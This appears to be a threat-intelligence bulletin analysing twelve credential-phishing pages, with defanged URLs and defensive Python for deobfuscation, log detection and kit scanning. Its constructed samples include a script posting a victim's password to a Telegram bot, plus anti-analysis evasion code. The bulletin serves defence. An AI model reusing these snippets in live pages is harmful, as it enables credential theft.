
Phish Wire - November 24 2025

Between November 06, 2025 and November 20, 2025, analysts identified a sophisticated campaign of multi-stage credential harvesting attacks primarily targeting Microsoft Office 365, OneDrive, and Adobe Cloud services, with additional incidents impersonating American Express, Paperless Post, and Greenvelope platforms. The incidents demonstrated consistently advanced TTPs including JavaScript-based credential exfiltration via AJAX/fetch() API calls, multi-factor authentication bypass techniques that collect both passwords and OTP tokens across staged authentication flows, and comprehensive anti-analysis evasion measures such as browser fingerprinting, developer tools detection, clipboard manipulation, and extensive code obfuscation using base64 encoding and randomized variable names.

Domains Reviewed

  • doc-invitation[.]de/drive/
  • aexluvil30g0d-u2f3hu9828y9[.]com/bad[.]php
  • www[.]leor24[.]com/pages/about-us
  • host[.]megiri[.]sa[.]com/1xrq6uqwubqlm2?02d14c420d706-7fafd751e4b77ecc8f...
  • f005[.]backblazeb2[.]com/file/onedrive21123/onedr-updated+(6)[.]html
  • newportalx0-rfpdocuments28[.]us-lax-1[.]linodeobjects[.]com/index[.]html...
  • g-uts[.]learchatsfield[.]info/Eim6XF0H50EvvzIvp6lur81bkQVqYRSuPOU7JLbNTo...
  • 10[.]216[.]66[.]84/?rid=WHplUmL
  • authenticating[.]h-hgenexcs[.]com/AEby6xZHgH1JWjZWuzXTBTfDHdq7a0PRvNdh5Y...
  • jointheagenda[.]com/invitation/
  • www[.]casasabores[.]com[.]br/8bd0452e9c2623579fdb7540bab/
  • brizodata[.]sbs/SHRBxvGVxSqfR01djs9chX15avPdhAGoVMEyhcXXLobGrw3uYHE1Zf3E...

On November 19, 2025, an employee at a Minnesota organization clicked the below phishing page.

[Screenshot 01]

This phishing page uses a multi-stage credential capture technique that initially submits credentials via AJAX POST to 'next.php', then forces a second authentication attempt before triggering an OTP collection phase that posts to 'Analysis405/otp_process.php', effectively implementing a complete account takeover flow. The page impersonates Adobe Cloud document sharing and employs several sophisticated social engineering tactics including brand impersonation with Adobe logos, urgency messaging about document access requirements, and a professional UI that mimics legitimate cloud storage authentication flows across multiple email providers (Gmail, Outlook, Yahoo, AOL, Office365).

The JavaScript implements a counter-based system that requires at least two failed login attempts before proceeding to the OTP phase, uses dynamic UI manipulation to show loading states and success messages, and includes hidden form fields to track victim email and selected provider across the multi-stage process. The infrastructure appears to be hosted on a compromised or malicious domain (doc-invitation.de) with Cloudflare protection, and the sophistication level is moderate to advanced given the multi-stage approach, realistic UI/UX design, comprehensive email provider coverage, and the seamless integration of both credential and MFA token collection in a single attack flow.

On November 17, 2025, an employee at a Florida organization clicked the below phishing page.

[Screenshot 02]

This phishing page uses a standard HTML form submission to capture American Express gift card credentials, with the form posting to an unspecified endpoint when the "Sign In" button is clicked. The page demonstrates moderate sophistication through several notable TTPs: it integrates Google reCAPTCHA v3 (most plausibly to keep automated crawlers and sandboxes from reaching the form rather than to protect anything), pulls legitimate American Express branding and styling from official CDN resources at aexp-static.com and ctfassets.net for visual authenticity, and sits on a domain (aexluvil30g0d-u2f3hu9828y9.com) whose random-looking structure is designed to evade pattern-based blocking while still being presented as an American Express service.

The page carries a robots meta tag with "noindex, nofollow" directives to keep it out of search engine indexes, and references multiple external scripts including tracking pixels and analytics services, suggesting it is part of a larger campaign infrastructure. While the core credential capture mechanism is basic form-based collection, the attention to visual fidelity, the anti-indexing measures, and the use of legitimate third-party services indicate a well-resourced phishing operation targeting American Express gift card users.

On November 16, 2025, an employee at a Minnesota organization clicked on a phishing page featuring inappropriate content.

[Screenshot 03]

The HTML captured for this incident does not, on its own, show a phishing page. The code is an extensive CSS framework with design tokens and component styling (modals, forms, accordions and similar UI elements) for what appears to be an interactive help or feedback widget from a legitimate service platform, the kind of styling typical of enterprise customer support widgets.

The "Market Sans" font family and the comprehensive set of CSS custom properties point to a professional design system rather than a phishing kit, and the captured markup contains no credential capture forms, JavaScript exfiltration methods, or social engineering text, only UI component styling and layout definitions. That verdict is limited to the markup that was captured: the content the employee actually saw may have been loaded by script or served from a different path than the one analyzed, so the capture should not be read as clearing the site.

On November 14, 2025, an employee at a Florida organization clicked the below phishing page.

[Screenshot 04]

This phishing page uses a JavaScript-based credential exfiltration technique in which an extremely long base64-encoded variable named "un" holds obfuscated code that is likely decoded and executed at runtime, so credentials are stolen without a traditional form submission. The page implements several evasion techniques: a copy-event interception script that replaces whatever is copied from the page with the single character "d" (a page-level copy handler cannot reach the browser's address bar, so the target is an analyst copying decoded strings or source out of the page rather than a victim copying the URL), hidden HTML content with fake loading messages ("Applying dynamic environment settings"), and a minimal visible interface whose only title text is "â" (a UTF-8 byte sequence displayed under the wrong encoding, so the real title is most likely a non-ASCII or zero-width character).

The infrastructure appears to be hosted on a compromised or suspicious domain (megiri.sa.com) with a complex URL structure containing encoded parameters, and the sophistication level is advanced due to the heavy obfuscation of the main payload and the clipboard manipulation anti-analysis technique. The lack of visible login forms combined with the extensive JavaScript obfuscation suggests this is likely a real-time phishing kit or adversary-in-the-middle (AiTM) proxy that dynamically generates content based on the decoded payload.

On November 13, 2025, an employee at a Kentucky organization clicked the below phishing page.

[Screenshot 05]

This OneDrive-themed phishing page uses JavaScript-based credential exfiltration via fetch() API calls to send stolen credentials to both an IP geolocation service (api.ipify.org) and a Telegram bot endpoint, with the obfuscated code suggesting data is transmitted to "https://api.telegram.org/bot" followed by an encoded bot token and chat ID.

The page implements several notable TTPs including heavily obfuscated JavaScript built from hex-escaped strings (extensive use of \x encoding throughout the code), geolocation lookup to capture the victim's IP address and location data before credential theft, and social engineering built on fake Microsoft OneDrive branding, urgency messaging about "secured files" requiring sign-in, and error handling for failed login attempts. The page is hosted on Backblaze B2 cloud storage (f005.backblazeb2.com), an abuse of legitimate cloud infrastructure, and demonstrates moderate to advanced sophistication through its two-stage data collection (IP and location first, then credentials), real-time exfiltration to Telegram, and extensive code obfuscation to evade detection.
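As an added example (written for this editorial pass, not code recovered from the kit or written by the Phish Wire authors), the following Python peels off the two obfuscation layers described above, \x-escaped string literals and atob() base64 blobs, and pulls out the exfiltration indicators an analyst wants first: the Telegram bot URL, any string matching the shape of a Telegram bot token, chat-id candidates, and the IP lookup endpoint. The embedded JavaScript sample is constructed to mirror the described kit; its bot token and chat id are fake placeholders, not real credentials.

```python
import base64
import re

# Constructed sample modeled on the hex-escaped OneDrive kit described above.
# It is example input written for this article, not code recovered from the page.
# The bot token and chat id are fake placeholders (Telegram tokens are <digits>:<35 chars>).
FAKE_TOKEN = "123456789:" + "AAFakeTokenForExampleOnly" + "0" * 10
FAKE_CHAT_ID = "-1001234567890"

SAMPLE_JS = (r'''
var _0x4f2a = ["\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x69\x70\x69\x66\x79\x2e\x6f\x72\x67\x2f\x3f\x66\x6f\x72\x6d\x61\x74\x3d\x6a\x73\x6f\x6e",
               "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x74\x65\x6c\x65\x67\x72\x61\x6d\x2e\x6f\x72\x67\x2f\x62\x6f\x74",
               "\x2f\x73\x65\x6e\x64\x4d\x65\x73\x73\x61\x67\x65"];
var tok = atob("__TOKEN__");
var chat = atob("__CHAT__");
fetch(_0x4f2a[0]).then(function (r) { return r.json(); }).then(function (geo) {
  fetch(_0x4f2a[1] + tok + _0x4f2a[2], {method: "POST",
        body: JSON.stringify({chat_id: chat,
                              text: geo.ip + " | " + document.getElementById("pw").value})});
});
'''.replace("__TOKEN__", base64.b64encode(FAKE_TOKEN.encode()).decode())
   .replace("__CHAT__", base64.b64encode(FAKE_CHAT_ID.encode()).decode()))

HEX_RUN = re.compile(r'(?:\\x[0-9a-fA-F]{2}){4,}')           # four or more \xNN escapes in a row
ATOB_CALL = re.compile(r'atob\(\s*["\']([A-Za-z0-9+/]+={0,2})["\']\s*\)')
URL = re.compile(r'https?://[\w.-]+(?:/[\w./?=&%-]*)?')
TELEGRAM_TOKEN = re.compile(r'\b\d{8,10}:[A-Za-z0-9_-]{35}\b')  # shape of a Telegram bot token
QUOTED_NUMERIC = re.compile(r'["\'](-?\d{6,14})["\']')          # chat_id candidates


def decode_hex_escapes(js: str) -> str:
    """Replace each run of backslash-x hex escapes with the characters it encodes."""
    return HEX_RUN.sub(
        lambda m: bytes.fromhex(m.group(0).replace("\\x", "")).decode("latin-1"), js)


def decode_atob_calls(js: str) -> str:
    """Replace atob("...") with the decoded literal when it decodes to printable text."""
    def _sub(m):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
        return '"' + text + '"' if text.isprintable() else m.group(0)
    return ATOB_CALL.sub(_sub, js)


def extract_exfil_indicators(js: str) -> dict:
    """Decode both layers, then collect the endpoints and identifiers worth acting on."""
    plain = decode_atob_calls(decode_hex_escapes(js))
    return {
        "hex_escape_runs": len(HEX_RUN.findall(js)),
        "urls": sorted(set(URL.findall(plain))),
        "telegram_bot_tokens": sorted(set(TELEGRAM_TOKEN.findall(plain))),
        "chat_id_candidates": sorted(set(QUOTED_NUMERIC.findall(plain))),
        "uses_telegram": "api.telegram.org/bot" in plain,
        "uses_ip_lookup": "api.ipify.org" in plain,
        "decoded_js": plain,
    }


if __name__ == "__main__":
    result = extract_exfil_indicators(SAMPLE_JS)
    for key in ("urls", "telegram_bot_tokens", "chat_id_candidates", "uses_telegram"):
        print(key, "=", result[key])
```

Run it over a saved page body rather than the live URL. A recovered bot token is actionable on its own: Telegram's Bot API getMe method on that token identifies the operator's bot, and the token is what a takedown request to Telegram needs, so record it alongside the page hash before the kit rotates it.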

On November 13, 2025, an employee at an Illinois organization clicked the below phishing page.

[Screenshot 06]

This phishing page uses a sophisticated multi-stage credential harvesting approach that mimics Microsoft's authentication flow, collecting usernames and passwords through JavaScript form handlers that likely exfiltrate data via fetch() or similar APIs to the attacker's backend (specific endpoints not visible in provided code). The page implements several advanced evasion techniques including anti-debugging protection with performance.now() timing checks that redirect users to whatnot.com if developer tools are detected, browser/automation detection that blocks access from WebDriver/Burp/Phantom, and keyboard event blocking to prevent common developer shortcuts like F12 and Ctrl+U.

The infrastructure leverages legitimate Linode object storage (linodeobjects.com), which lends credibility and hosting resilience, while the page demonstrates high sophistication through its pixel-perfect Microsoft UI replication, complete with authentic logos, styling, animations, and a multi-step authentication flow that closely mirrors the real Microsoft login experience. The obfuscated variable names, context menu blocking and copy protection indicate this is likely part of a professional phishing kit rather than a basic credential harvester.

On November 12, 2025, an employee at a Kentucky organization clicked the below phishing page.

[Screenshot 07]

This Microsoft login phishing page uses a sophisticated multi-stage credential harvesting approach with JavaScript-based exfiltration through external scripts (K2App58iPUPf4jkUkEO.js, zpfq39alwUSGvUN.js, mh9b1iRE2q2RZNvb.js) rather than traditional form POSTs, collecting username, password, and various MFA tokens (authenticator codes, SMS codes) across multiple realistic authentication steps. The page implements several advanced evasion techniques including extensive base64 obfuscation of configuration data, randomized CSS class names and element IDs to evade detection signatures, honeypot fields for bot detection, anti-inspection CSS rules disabling text selection and right-click, and a sophisticated PageValidator security handler with development/strict presets.

Notable sophisticated features include realistic Microsoft authentication flow simulation with proper loading animations and overlays, integration with external CDN resources and Cloudflare services, and extensive use of encoded strings and randomized variable names throughout the JavaScript configuration objects. The overall sophistication level is advanced, particularly due to the multi-vector evasion techniques, realistic UI mimicry of legitimate Microsoft authentication flows, and the apparent integration with external credential collection infrastructure rather than simple form submissions.

On November 11, 2025, an employee at a Maryland organization clicked the below phishing page.

[Screenshot 08]

This phishing page impersonates the Microsoft sign-in and OAuth authorization flow. Credentials are captured through a standard HTML form POST to "/common/login" on the attacker's server at 10.216.66.84, while a base href pointing at the legitimate Microsoft login service lets relative resources and links resolve to Microsoft and keeps the page looking authentic. The most significant features observed are comprehensive Microsoft branding with authentic-looking OAuth flow parameters, and a $Config object carrying the browser fingerprinting and client telemetry settings the real sign-in page uses. The nonce attributes on script tags, the CSRF token field and the state-management logic are most plausibly carried over from the cloned Microsoft page rather than attacker-built evasion; they do not bypass security controls, but they make the clone hard to tell apart from the original.

The form target, 10.216.66.84, is an RFC 1918 private address and is not reachable from the internet, so the victim's browser reached it from a network that could route to it. That is consistent with a compromised internal host serving the page, but a proxy or sandbox that rewrote the URL would look the same in this data, and the captured page does not settle which applies. The legitimate Microsoft CDN resources (aadcdn.msftauth.net), the OAuth2 authorization parameters (state token and PKCE code challenge) copied from a real authorization request, and the client-side telemetry collection in $Config all make the clone faithful, and the telemetry would let the operator profile victims if it is posted to the attacker's host rather than to Microsoft.

On November 10, 2025, an employee at a Maryland organization clicked the below phishing page.

[Screenshot 09]

This phishing page captures credentials through a multi-stage JavaScript-based exfiltration system that likely uses fetch() or XMLHttpRequest calls (referenced through external scripts kV5MJ9LPKJXePXA.js and XQZA9ftrP63yNyTn.js) rather than traditional form submission. The page demonstrates moderate to advanced sophistication with several notable anti-analysis techniques including complete disabling of right-click and text selection, honeypot fields with class "a_section_981" positioned off-screen to detect automated bots, and extensive CSS obfuscation using randomized class names (a_widget_394, a_section_929, etc.) to hinder analysis.

The infrastructure leverages what appears to be a compromised or disposable hosting service with the suspicious domain "h-hgenexcs.com" and includes base64-encoded configuration data in the phpConfig object, along with a sophisticated PageValidator security handler that likely performs geofencing or user-agent filtering before credential collection. The presence of loading animations, Microsoft-style branding elements, and integration with legitimate services like jQuery CDN suggests this is designed to capture Microsoft/Office 365 credentials with high visual fidelity.

On November 10, 2025, an employee at a Washington organization clicked the below phishing page.

[Screenshot 10]

This phishing page uses a multi-stage credential capture technique with form POST submissions to "processmail.php" and "process.php", implementing a sophisticated social engineering flow that first collects email/password credentials, then deliberately shows an "Incorrect Password" error to prompt re-entry, followed by an OTP collection phase mimicking multi-factor authentication. The attack impersonates Paperless Post invitation service with brand logos and implements personalization through URL parameters (name=X) that get dynamically inserted via JavaScript typing animations, while using multiple email provider buttons (Outlook, Office365, Yahoo, Gmail, AOL) to increase victim targeting.

The page demonstrates moderate sophistication with its multi-modal interface using Bootstrap modals, AJAX-based form handling to prevent page reloads, a fake countdown timer for OTP urgency, and anti-resubmission logic, though it lacks advanced evasion techniques like geofencing or code obfuscation. Notably, the Gmail button redirects to an external domain "vipinvites.de/accounts.google" while other providers use local processing, and the page includes Cloudflare challenge scripts indicating it's likely using Cloudflare's services for hosting and bot protection.

On November 10, 2025, an employee at a Kentucky organization clicked the below phishing page.

[Screenshot 11]

This phishing page uses a multi-stage credential harvesting approach with form POST submissions to "processmail.php" for initial credentials and "process.php" for OTP collection, implementing a sophisticated three-stage attack flow that first displays "Incorrect Password" to prompt re-entry, then requests phone-based OTP verification to bypass multi-factor authentication.

The site impersonates Greenvelope (online invitations service) while offering multiple email provider login options (Outlook, Office365, Yahoo, AOL), employs jQuery AJAX for seamless credential submission without page reloads, and includes realistic social engineering elements like countdown timers, loading animations, and fake OTP delivery notifications. The attack is hosted on a compromised legitimate domain (casasabores.com.br) with a random hash path (/8bd0452e9c2623579fdb7540bab/), demonstrating moderate to advanced sophistication through its MFA bypass capability and multi-stage collection process designed to capture both passwords and second-factor authentication tokens.
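The Adobe, Paperless Post and Greenvelope pages above share one server-side shape: a POST to a first .php endpoint, often repeated after a fake "Incorrect Password" error, followed within minutes by a POST to a second endpoint that collects the OTP. That sequence is visible in web proxy logs even when the page content is not. The following Python is an added example written for this article, not tooling from the Phish Wire authors; the log format, hostnames and addresses are constructed (reserved .example names and TEST-NET-1 addresses), and the 15-minute window and the endpoint-name hints are assumptions to tune against your own traffic.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Iterable, List
from urllib.parse import urlsplit

# Constructed proxy log (timestamp, client, method, URL, status) written for this article
# with reserved .example hostnames and TEST-NET-1 addresses; it is not a real capture.
# Client .10 reproduces the staged flow: password POST, re-entry after a fake error, OTP POST.
# Client .11 makes a single .php POST; client .12 makes two, but an hour apart.
SAMPLE_LOG = """
2025-11-19T14:02:11Z 192.0.2.10 GET https://invite-share.example/drive/ 200
2025-11-19T14:02:40Z 192.0.2.10 POST https://invite-share.example/drive/next.php 200
2025-11-19T14:03:05Z 192.0.2.10 POST https://invite-share.example/drive/next.php 200
2025-11-19T14:03:50Z 192.0.2.10 POST https://invite-share.example/drive/otp_process.php 200
2025-11-19T14:10:30Z 192.0.2.11 POST https://intranet.example/wiki/search.php 200
2025-11-19T15:30:00Z 192.0.2.12 POST https://shop.example/cart/add.php 200
2025-11-19T16:30:00Z 192.0.2.12 POST https://shop.example/cart/otp.php 200
"""

# Endpoint-name hints for the second stage; taken from the kits above (otp_process.php,
# process.php) plus common variants. Assumption: tune to what your own logs show.
SECOND_STAGE = re.compile(r'otp|verif|code|process', re.IGNORECASE)


def parse_line(line: str) -> dict:
    """Parse one constructed log line into a record; adapt this for a real proxy format."""
    ts, client, method, url, status = line.split()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "client": client,
            "method": method, "url": url, "status": int(status)}


def find_staged_harvests(lines: Iterable[str],
                         window: timedelta = timedelta(minutes=15)) -> List[dict]:
    """Flag (client, host) pairs that POST to two or more distinct .php endpoints inside
    `window`, where a later endpoint looks like a second-factor stage."""
    posts = defaultdict(list)                       # (client, host) -> [(ts, path), ...]
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        u = urlsplit(rec["url"])
        if rec["method"] == "POST" and u.path.lower().endswith(".php"):
            posts[(rec["client"], u.hostname)].append((rec["ts"], u.path))

    alerts = []
    for (client, host), events in posts.items():
        events.sort()
        for i, (start, _) in enumerate(events):    # sliding window anchored at each POST
            burst = [(t, p) for t, p in events[i:] if t - start <= window]
            paths = [p for _, p in burst]
            distinct = list(dict.fromkeys(paths))  # order-preserving unique endpoints
            later_otp = any(SECOND_STAGE.search(p.rsplit("/", 1)[-1]) for p in distinct[1:])
            if len(distinct) >= 2 and later_otp:
                alerts.append({
                    "client": client, "host": host, "endpoints": distinct,
                    # the same endpoint hit twice is the fake "Incorrect Password" re-entry
                    "password_reentry": len(paths) > len(distinct),
                    "first_seen": burst[0][0], "last_seen": burst[-1][0],
                })
                break                              # one alert per client/host pair
    return alerts


if __name__ == "__main__":
    for alert in find_staged_harvests(SAMPLE_LOG.splitlines()):
        print(alert)
```

The alert carries the client, the host and the ordered endpoint list, which is what an incident responder needs to pull the user's session history and start a credential reset; the password_reentry flag distinguishes the deliberate "Incorrect Password" trick from a single mistyped submission. An allowlist of internal hosts that legitimately post to several .php endpoints (the intranet example above only survives because it makes one POST) should be added before this runs over production logs.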

On November 06, 2025, an employee at a Maryland organization clicked the below phishing page.

[Screenshot 12]

This Microsoft Office/Outlook phishing page uses multi-stage credential harvesting through AJAX POST requests to endpoints defined in external JavaScript files (r2oWoZJ0N0G519B.js, cPpooj21cLe5yfmc.js, QnO84eeFjEjonC2aJQC.js), collecting username, password, and MFA codes across separate form submissions with real-time validation. The page employs moderate sophistication with extensive anti-analysis measures including honeypot fields for bot detection, disabled text selection and right-click context menus, obfuscated class names and IDs using randomized alphanumeric strings, and base64-encoded configuration data stored in window variables like var_state_347 and var_settings_403.

Key evasion techniques include a security validation system (PageValidator.create) that likely performs environment checks, CSS-based content hiding until validation passes, and integration with an external CDN-hosted library from statically.io for additional functionality. The multi-step authentication simulation is particularly sophisticated, mimicking legitimate Microsoft MFA flows including SMS verification, authenticator app approval with animated number displays, and various 2FA backup options, making this a notably advanced credential harvesting operation rather than a basic form-based phish.
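The Microsoft-themed kits above (the Linode-hosted page with its performance.now() devtools check and WebDriver/Phantom detection, the h-hgenexcs and Office/Outlook pages with honeypot fields, randomized class names and base64 configuration blobs, and the megiri.sa.com page with clipboard interception) share a small set of static markers that can be scored without executing the page. The following Python is an added example written for this article, not code from the kits or from the Phish Wire authors; the indicator patterns, weights and verdict thresholds are assumptions to tune, and the embedded HTML sample is constructed to exercise the checks, not a captured page.

```python
import re
from typing import Callable, Dict, List, Tuple

# Constructed sample combining the markers described above; not a captured page.
# The base64 blob is filler of the right alphabet and length, not real configuration.
SAMPLE_HTML = """<!doctype html><html><head>
<meta name="robots" content="noindex, nofollow">
<style>body{user-select:none}.a_widget_394{display:flex}.a_section_929{margin:0}.a_panel_112{padding:0}</style>
</head><body oncontextmenu="return false">
<form id="login" action="next.php" method="post">
  <input type="email" name="email" class="a_input_771">
  <input type="password" name="pw" class="a_input_772">
  <input type="text" name="a_section_981" style="position:absolute;left:-9999px" tabindex="-1" autocomplete="off">
  <button class="a_button_205">Sign in</button>
</form>
<script>
var cfg = JSON.parse(atob("__BLOB__"));
document.addEventListener("keydown", function (e) { if (e.keyCode === 123 || (e.ctrlKey && e.keyCode === 85)) e.preventDefault(); });
document.addEventListener("copy", function (e) { e.clipboardData.setData("text/plain", "d"); e.preventDefault(); });
(function () { var t = performance.now(); debugger; if (performance.now() - t > 100) location.replace("https://example.com/"); })();
if (navigator.webdriver || window._phantom || window.callPhantom) location.replace("https://example.com/");
document.getElementById("login").addEventListener("submit", function (e) {
  e.preventDefault(); fetch("next.php", {method: "POST", body: new FormData(e.target)});
});
</script></body></html>""".replace("__BLOB__", "QUJD" * 60)

BENIGN_HTML = """<html><head><title>Contact</title></head><body>
<form action="/contact" method="post"><input name="msg"><button>Send</button></form></body></html>"""

# Regex-backed indicators: (name, weight, pattern), matched case-insensitively.
# Weights are assumptions: high for markers with no benign reason on a login page.
INDICATORS: List[Tuple[str, int, str]] = [
    ("form_post_php", 1, r'<form[^>]+action=["\'][^"\']*\.php'),
    ("js_exfil_call", 1, r'\bfetch\(|XMLHttpRequest|\$\.(?:ajax|post)\('),
    ("telegram_exfil", 3, r'api\.telegram\.org/bot'),
    ("honeypot_field", 2, r'<input[^>]*style=["\'][^"\']*(?:left:\s*-\d+px|display:\s*none)'),
    ("automation_detection", 2, r'navigator\.webdriver|_phantom|callPhantom|PhantomJS'),
    ("keyboard_blocking", 2, r'(?:keyCode|which)\s*===?\s*123|key\s*===?\s*["\']F12["\']'),
    ("contextmenu_blocking", 1, r'oncontextmenu\s*=|["\']contextmenu["\']'),
    ("selection_blocking", 1, r'user-select\s*:\s*none|onselectstart'),
    ("clipboard_interception", 3, r'clipboardData\.setData|["\']copy["\']\s*,'),
    ("noindex_meta", 1, r'<meta[^>]+content=["\'][^"\']*noindex'),
    ("base64_blob", 2, r'[A-Za-z0-9+/]{200,}={0,2}'),
]


def _devtools_timing_check(html: str) -> bool:
    # performance.now() paired with a debugger statement: an open debugger inflates the delta
    return bool(re.search(r'performance\.now\(', html)) and bool(re.search(r'\bdebugger\b', html))


def _hex_escape_heavy(html: str) -> bool:
    return len(re.findall(r'\\x[0-9a-fA-F]{2}', html)) >= 50


def _randomized_class_names(html: str) -> bool:
    # names like a_widget_394 / var_state_347: word parts joined by underscores, three trailing digits
    return len(set(re.findall(r'\b[a-z]+_(?:[a-z]+_)?\d{3}\b', html))) >= 5


COMPOUND_CHECKS: List[Tuple[str, int, Callable[[str], bool]]] = [
    ("devtools_timing_check", 3, _devtools_timing_check),
    ("hex_escape_heavy", 2, _hex_escape_heavy),
    ("randomized_class_names", 2, _randomized_class_names),
]


def scan_html(html: str) -> dict:
    """Score a page body for phishing-kit markers; returns the hits with a short evidence snippet."""
    hits: Dict[str, str] = {}
    score = 0
    for name, weight, pattern in INDICATORS:
        m = re.search(pattern, html, re.IGNORECASE)
        if m:
            hits[name] = m.group(0)[:60]
            score += weight
    for name, weight, check in COMPOUND_CHECKS:
        if check(html):
            hits[name] = "(compound check)"
            score += weight
    if score >= 8:
        verdict = "likely phishing kit"
    elif score >= 3:
        verdict = "suspicious"
    else:
        verdict = "no kit markers"
    return {"score": score, "verdict": verdict, "hits": hits}


if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(label, scan_html(page)["verdict"], sorted(scan_html(page)["hits"]))
```

Scores from this kind of scanner are triage input, not a verdict: honeypot fields, context-menu blocking and user-select: none appear on legitimate sites too, which is why the high-weight markers are the ones with no benign reason on a sign-in page (clipboard rewriting, a debugger-timed devtools check, a Telegram exfiltration URL). Run it over the page body as fetched by a real browser profile, since several of these kits serve different content to automation.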

Recommendations

  • Implement email security controls to flag messages containing links to newly registered domains or suspicious domain patterns (e.g., domains built from random character strings, or newly registered domains under the TLDs seen in this period: .de, .com, .info, .sbs)
  • Configure URL filtering and web proxies to detect and block access to domains exhibiting suspicious patterns like excessive random characters, base64-encoded parameters, or hosting on compromised legitimate websites
  • Deploy enhanced monitoring for legitimate cloud storage services (Backblaze, Linode, etc.) by flagging external emails containing links to these platforms and requiring additional verification for document access requests
  • Enable advanced threat protection features that can detect JavaScript obfuscation techniques, including base64 encoding, hex-encoded strings, and clipboard manipulation scripts commonly used in sophisticated phishing kits
  • Implement conditional access policies that flag risky or anomalous Office 365 sign-ins and require additional verification; separately, treat a phishing page served from a private address such as 10.216.66.84 as evidence of a compromised or abused host inside the network, since such an address cannot be reached from the internet, and investigate the host rather than the sender
  • Conduct targeted user awareness training focused on recognizing multi-stage authentication phishing, fake error messages requesting password re-entry, and urgency tactics around OTP/MFA token requests
  • Deploy endpoint detection capabilities that can identify and block anti-debugging techniques such as developer tool detection, right-click blocking, and performance timing checks used by advanced phishing pages